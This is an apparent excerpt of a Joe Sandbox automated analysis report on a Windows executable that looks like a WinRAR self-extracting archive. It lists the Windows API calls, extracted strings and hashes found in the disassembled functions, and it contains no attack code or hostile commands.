                                                                                                                                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                                                                                      • API String ID: 4196654922-3505469590
                                                                                                                                                      • Opcode ID: 1f905f6f04f162ddb9263077d7b08a58c9684c8036a0238ec6fb49c876beaa37
                                                                                                                                                      • Instruction ID: 005d7e75baa1a88a7e95775ca1b434a4ab0080a1692f1862c16eaf9abd01cd10
                                                                                                                                                      • Opcode Fuzzy Hash: 1f905f6f04f162ddb9263077d7b08a58c9684c8036a0238ec6fb49c876beaa37
                                                                                                                                                      • Instruction Fuzzy Hash: 9C611A71A00319AFDB14DFA4CCA5EAE77B9FF88711F144558F512A7290CB70AD02CB60
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: H_prolog3_wcslen
                                                                                                                                                      • String ID: $</p>$</style>$<br>$<style>
                                                                                                                                                      • API String ID: 3746244732-3393513139
                                                                                                                                                      • Opcode ID: 134d379d8ad9c2071920598d64e5d41435fff774d9d8ca769b7cd9d7fbf4109f
                                                                                                                                                      • Instruction ID: 077afbfaeee5654aeddddc4d4ca43f6a8eee22b7803b32ff86a2128d56a0ed7a
                                                                                                                                                      • Opcode Fuzzy Hash: 134d379d8ad9c2071920598d64e5d41435fff774d9d8ca769b7cd9d7fbf4109f
                                                                                                                                                      • Instruction Fuzzy Hash: 2851F135B40313A6DF34DB6588627BBA3B6AF74781F580119FD81AB2C0EB759D81C3A0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00A21E44: GetDlgItem.USER32(00000000,00003021), ref: 00A21E88
                                                                                                                                                        • Part of subcall function 00A21E44: SetWindowTextW.USER32(00000000,00A5C6C8), ref: 00A21E9E
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A40720
                                                                                                                                                      • SendMessageW.USER32(?,00000080,00000001,00010447), ref: 00A40747
                                                                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,16050E2A), ref: 00A40760
                                                                                                                                                      • GetDlgItem.USER32(?,00000065), ref: 00A4077C
                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A40790
                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A407A6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$Item$DialogTextWindow
                                                                                                                                                      • String ID: LICENSEDLG
                                                                                                                                                      • API String ID: 3077722735-2177901306
                                                                                                                                                      • Opcode ID: ed3904f2e11737bbdc76916d14e1f3ac2e3932bc7dd89749a80ee852eeda8d74
                                                                                                                                                      • Instruction ID: f16bbe06ace6fd4eb49dd19615136f8a6ad2d2144b9bbac1bc9b76c276cec7e2
                                                                                                                                                      • Opcode Fuzzy Hash: ed3904f2e11737bbdc76916d14e1f3ac2e3932bc7dd89749a80ee852eeda8d74
                                                                                                                                                      • Instruction Fuzzy Hash: C121F435248604BFD611DFB5DD4CEAB3B7DEB86745F014514F704A60A0DBB1AA42AB32
                                                                                                                                                      APIs
                                                                                                                                                      • __aulldiv.LIBCMT ref: 00A3783D
                                                                                                                                                        • Part of subcall function 00A3067E: GetVersionExW.KERNEL32(?), ref: 00A306AF
                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00A37860
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00A37872
                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A37883
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A37893
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A378A3
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A378DE
                                                                                                                                                      • __aullrem.LIBCMT ref: 00A37984
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1247370737-0
                                                                                                                                                      • Opcode ID: 69b6f322d258243ccfd273e6eb1f3aad35df7a6655e70c6ef55640639600f5e4
                                                                                                                                                      • Instruction ID: 3667296cb29b6627f672dd50df6411e85a8350fd35c8b6293a5884ffa60cf562
                                                                                                                                                      • Opcode Fuzzy Hash: 69b6f322d258243ccfd273e6eb1f3aad35df7a6655e70c6ef55640639600f5e4
                                                                                                                                                      • Instruction Fuzzy Hash: 805137B1508305AFD750DFA5C88496BBBF9FB88714F008A2EF59AD2211E734E549CB52
                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00A30E50
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,00000030), ref: 00A30E85
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00A30EC4
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A30ED4
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,00000030), ref: 00A30F51
                                                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,00000030), ref: 00A30F93
                                                                                                                                                      • _wcslen.LIBCMT ref: 00A30FA3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FullNamePath$_wcslen$H_prolog3_
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 840513527-0
                                                                                                                                                      • Opcode ID: d1047505104e8f17f207c0c91e4db5d9d3843f70187bf41653b18f5c9375bc3c
                                                                                                                                                      • Instruction ID: fb034b339d465062ad72aeed038f05f08001e29bd6e74bb9460d1b93f032c2d0
                                                                                                                                                      • Opcode Fuzzy Hash: d1047505104e8f17f207c0c91e4db5d9d3843f70187bf41653b18f5c9375bc3c
                                                                                                                                                      • Instruction Fuzzy Hash: 14616A71E00208ABCB18DFA9D985EEEBBB9EF89710F14412AF410E7291DB349940CB61
                                                                                                                                                      APIs
                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00A569AE,?,00000000,?,00000000,00000000), ref: 00A5627B
                                                                                                                                                      • __fassign.LIBCMT ref: 00A562F6
                                                                                                                                                      • __fassign.LIBCMT ref: 00A56311
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00A56337
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,00A569AE,00000000,?,?,?,?,?,?,?,?,?,00A569AE,?), ref: 00A56356
                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00A569AE,00000000,?,?,?,?,?,?,?,?,?,00A569AE,?), ref: 00A5638F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                      • Opcode ID: 7db7d9a162335b783686bcf6f29bf3ef397b53c72f781431721f713b0dd2c020
                                                                                                                                                      • Instruction ID: a6c8b9820ff5bda0323d8d0fb5b7b366a39a75f1df67068154b4eda8b56d02ff
                                                                                                                                                      • Opcode Fuzzy Hash: 7db7d9a162335b783686bcf6f29bf3ef397b53c72f781431721f713b0dd2c020
                                                                                                                                                      • Instruction Fuzzy Hash: 7C51A371A002499FDB10CFA8DC85AEEBBF8FF49321F14411AE956EB291E7709945CB60
                                                                                                                                                      APIs
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00A493F7
                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00A493FF
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00A49488
                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00A494B3
                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00A49508
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 8c65cba2ac67d917b875c87f4dd146383fa848879b15443cf5e9474f51c040ae
• Instruction ID: 51a1c2106a32b5e942bbf640b994ad988568bcbbdd237904df91e45f37703fd4
• Opcode Fuzzy Hash: 8c65cba2ac67d917b875c87f4dd146383fa848879b15443cf5e9474f51c040ae
• Instruction Fuzzy Hash: 7F41843CA00218ABCF10DF68C885A9F7BF5BF85324F148155E8199B392D735AA16CB92
APIs
• __EH_prolog3_GS.LIBCMT ref: 00A3E26C
• ShowWindow.USER32(?,00000000,00000038), ref: 00A3E294
• GetWindowRect.USER32(?,?), ref: 00A3E2D8
• ShowWindow.USER32(?,00000005,?,00000000), ref: 00A3E373
• ShowWindow.USER32(00000000,00000005), ref: 00A3E394
Strings
Similarity
• API ID: Window$Show$H_prolog3_Rect
• String ID: RarHtmlClassName
• API String ID: 950582801-1658105358
• Opcode ID: a619037203b26f7903024678a9fa54efc1622ebacbf222e0470be5e3ef9806bf
• Instruction ID: d6257f0f44bbc39950df6d0617f2c0aa00f9b920d5e60c0c758f7a5912b2de0d
• Opcode Fuzzy Hash: a619037203b26f7903024678a9fa54efc1622ebacbf222e0470be5e3ef9806bf
• Instruction Fuzzy Hash: 70414771900204EFDF11DFA4DD89BAE7BB8EF48300F548169F908AB1A1DB309985CB61
APIs
  • Part of subcall function 00A53518: _free.LIBCMT ref: 00A53541
• _free.LIBCMT ref: 00A535A2
  • Part of subcall function 00A503D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?), ref: 00A503EA
  • Part of subcall function 00A503D4: GetLastError.KERNEL32(?,?,00A53546,?,00000000,?,00000000,?,00A5356D,?,00000007,?,?,00A5396A,?,?), ref: 00A503FC
• _free.LIBCMT ref: 00A535AD
• _free.LIBCMT ref: 00A535B8
• _free.LIBCMT ref: 00A5360C
• _free.LIBCMT ref: 00A53617
• _free.LIBCMT ref: 00A53622
• _free.LIBCMT ref: 00A5362D
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
• Instruction ID: 22fe1315802efeef7a58fd5e069eda8221e95a582872caf6d5ba51485fa0aced
• Opcode Fuzzy Hash: ab47a35b4bbe4dfe32203c1e62b6aae3bc761e273b4d797f2b7891905fbb6212
• Instruction Fuzzy Hash: 26112C72540B04BBD931BBB0CD06FCB779C7F40792F401815BB9A6A052EA75A6094790
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A44DDA,00A44D3D,00A44FDE), ref: 00A44D76
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A44D8C
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A44DA1
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
• API String ID: 667068680-1718035505
• Opcode ID: b8e27dec8f9296089ed66c3010b90ad2d5f8b9e18f762dd2d3b4cf454de42a88
• Instruction ID: cf1559f2cb3f8723035909467aa57128859de6126ba1b75bab9f2b374a3f4ddf
• Opcode Fuzzy Hash: b8e27dec8f9296089ed66c3010b90ad2d5f8b9e18f762dd2d3b4cf454de42a88
• Instruction Fuzzy Hash: 0AF0F679F01F22EB5B31DFF46C84776A3DCBA8D7263104939EA15D3280E660CC528690
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A4C5A2,00A4C5A2,?,?,?,00A5185A,00000001,00000001,C5E85006), ref: 00A51663
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A5185A,00000001,00000001,C5E85006,?,?,?), ref: 00A516E9
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A517E3
• __freea.LIBCMT ref: 00A517F0
  • Part of subcall function 00A5040E: RtlAllocateHeap.NTDLL(00000000,00A4535E,?,?,00A46C16,?,?,?,?,?,00A45269,00A4535E,?,?,?,?), ref: 00A50440
• __freea.LIBCMT ref: 00A517F9
• __freea.LIBCMT ref: 00A5181E
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
• Opcode ID: 194d282eede76d43ffa3a64b9619845737e309872f4d4c052420793986758323
• Instruction ID: e4e9c370f877807536e9bc36686b65e165f9a6afa2217133d6f4abd452d68d1a
• Opcode Fuzzy Hash: 194d282eede76d43ffa3a64b9619845737e309872f4d4c052420793986758323
• Instruction Fuzzy Hash: BF51B272600216AFDB258F68CD81FBB77AAFB48752F194628FC04D6150EB34DC98CA90
APIs
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?), ref: 00A37B06
  • Part of subcall function 00A3067E: GetVersionExW.KERNEL32(?), ref: 00A306AF
• LocalFileTimeToFileTime.KERNEL32(?,?,?,?), ref: 00A37B2A
• FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00A37B44
• TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?,?,?), ref: 00A37B57
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00A37B67
• SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00A37B77
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 4ed9336822aab16427fcf4fc31d4c68c2109ea825752d207ff5fe29e48880cdf
• Instruction ID: f9483460c3d6425b8a681cade2cb1178bc78c884f391195df768fdf32b0e9a62
• Opcode Fuzzy Hash: 4ed9336822aab16427fcf4fc31d4c68c2109ea825752d207ff5fe29e48880cdf
• Instruction Fuzzy Hash: 8841E4761083159FC704DFA8C88499BB7F8BF98714F044A1AF99AC7211E730D949CBA6
APIs
• FileTimeToSystemTime.KERNEL32(?,?,5C02E116,?,?,?,?,00A5AA27,000000FF), ref: 00A3F38A
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,00A5AA27,000000FF), ref: 00A3F399
• SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3A7
• FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3B5
• GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3D0
• GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032,?,?,?,?,00A5AA27,000000FF), ref: 00A3F3FA
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$Format$DateLocalSpecific
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 909090443-0
APIs
• GetLastError.KERNEL32(?,?,00A49771,00A496CC,00A46A64), ref: 00A49788
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A49796
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A497AF
• SetLastError.KERNEL32(00000000,00A49771,00A496CC,00A46A64), ref: 00A49801
Memory Dump Source
• Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,00A4B581,?,00A6E088,?,00A4AE80,?,00A6E088,?,00000007), ref: 00A50009
• _free.LIBCMT ref: 00A5003C
• _free.LIBCMT ref: 00A50064
• SetLastError.KERNEL32(00000000,00A6E088,?,00000007), ref: 00A50071
• SetLastError.KERNEL32(00000000,00A6E088,?,00000007), ref: 00A5007D
• _abort.LIBCMT ref: 00A50083
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A43FDB
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A43FF5
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A44006
• TranslateMessage.USER32(?), ref: 00A44010
• DispatchMessageW.USER32(?), ref: 00A4401A
• WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A44025
Similarity
• API ID: Message$ObjectSingleWait$DispatchPeekTranslate
• String ID:
• API String ID: 2148572870-0
APIs
• GetDlgItem.USER32(?,00000066), ref: 00A426A9
• SendMessageW.USER32(00000000,00000143,00000000,00A75380), ref: 00A426D6
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A42702
Strings
• ProgramFilesDir, xrefs: 00A425E0
• Software\Microsoft\Windows\CurrentVersion, xrefs: 00A425F4
Similarity
• API ID: MessageSend$Item
• String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
• API String ID: 3888421826-2634093826
APIs
Strings
Similarity
• API ID: _wcslen$H_prolog3
• String ID: &nbsp;$<br>
• API String ID: 1035939448-26742755
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\M1Y6kc9FpE.exe,00000104), ref: 00A4EE6A
• _free.LIBCMT ref: 00A4EF35
• _free.LIBCMT ref: 00A4EF3F
Strings
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\M1Y6kc9FpE.exe$`&C
• API String ID: 2506810119-2212709020
APIs
• __EH_prolog3_GS.LIBCMT ref: 00A43F03
• SetEnvironmentVariableW.KERNEL32(sfxcmd,?,?,?,?,?,?,00000028), ref: 00A43F1B
• SetEnvironmentVariableW.KERNEL32(sfxpar,?,?,?,?,?,?,?,00000028), ref: 00A43F86
Strings
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnvironmentVariable$H_prolog3_
                                                                                                                                                      • String ID: sfxcmd$sfxpar
                                                                                                                                                      • API String ID: 3605364767-3493335439
                                                                                                                                                      • Opcode ID: 4166195ad1ad48b41ab4bd525ad2264118ec195d5b2c7444fd204adddb91b144
                                                                                                                                                      • Instruction ID: a42491de309b95ee16d8abac52ac675b9b5adcaf273fcc334669a238887cd42c
                                                                                                                                                      • Opcode Fuzzy Hash: 4166195ad1ad48b41ab4bd525ad2264118ec195d5b2c7444fd204adddb91b144
                                                                                                                                                      • Instruction Fuzzy Hash: B9212875D10218EFCF18DFA8DA859EDB7F9FB48301B10442AF441AB241DB31AA48CB64
                                                                                                                                                      APIs
                                                                                                                                                      • LoadBitmapW.USER32(00000065), ref: 00A407F5
                                                                                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A4081A
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A4084C
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00A4086F
                                                                                                                                                        • Part of subcall function 00A3EBD3: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00A40845,00000066), ref: 00A3EBE6
                                                                                                                                                        • Part of subcall function 00A3EBD3: SizeofResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EBFD
                                                                                                                                                        • Part of subcall function 00A3EBD3: LoadResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC14
                                                                                                                                                        • Part of subcall function 00A3EBD3: LockResource.KERNEL32(00000000,?,?,?,00A40845,00000066), ref: 00A3EC23
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A40845,00000066), ref: 00A3EC3E
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalLock.KERNEL32(00000000), ref: 00A3EC4F
                                                                                                                                                        • Part of subcall function 00A3EBD3: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00A3EC73
                                                                                                                                                        • Part of subcall function 00A3EBD3: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A3ECB8
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalUnlock.KERNEL32(00000000), ref: 00A3ECD7
                                                                                                                                                        • Part of subcall function 00A3EBD3: GlobalFree.KERNEL32(00000000), ref: 00A3ECDE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_a20000_M1Y6kc9FpE.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                      • String ID: ]
                                                                                                                                                      • API String ID: 1797374341-3352871620
                                                                                                                                                      • Opcode ID: cd25da06b42ae6ef7f9e42aed1208ea5f4fb9adcb63d2f9cde965e765176ddaf
                                                                                                                                                      • Instruction ID: 66b46bc763d99687395b2c42c40ec654860dfffe92c0ae2b80b999349b7dbb81
                                                                                                                                                      • Opcode Fuzzy Hash: cd25da06b42ae6ef7f9e42aed1208ea5f4fb9adcb63d2f9cde965e765176ddaf
                                                                                                                                                      • Instruction Fuzzy Hash: B101B53A940219A7DB11EBA49E09E7F7A7AAFC0B56F050024FA05E72D1DF71CC0696F1
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A4ECE0,00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002), ref: 00A4ED4F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A4ED62
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A4ECE0,00000000,?,00A4EC80,00000000,00A66F40,0000000C,00A4EDD7,00000000,00000002), ref: 00A4ED85
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.1575485848.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.1575387639.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575595230.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A69000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575634660.0000000000A72000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.1575692798.0000000000A77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
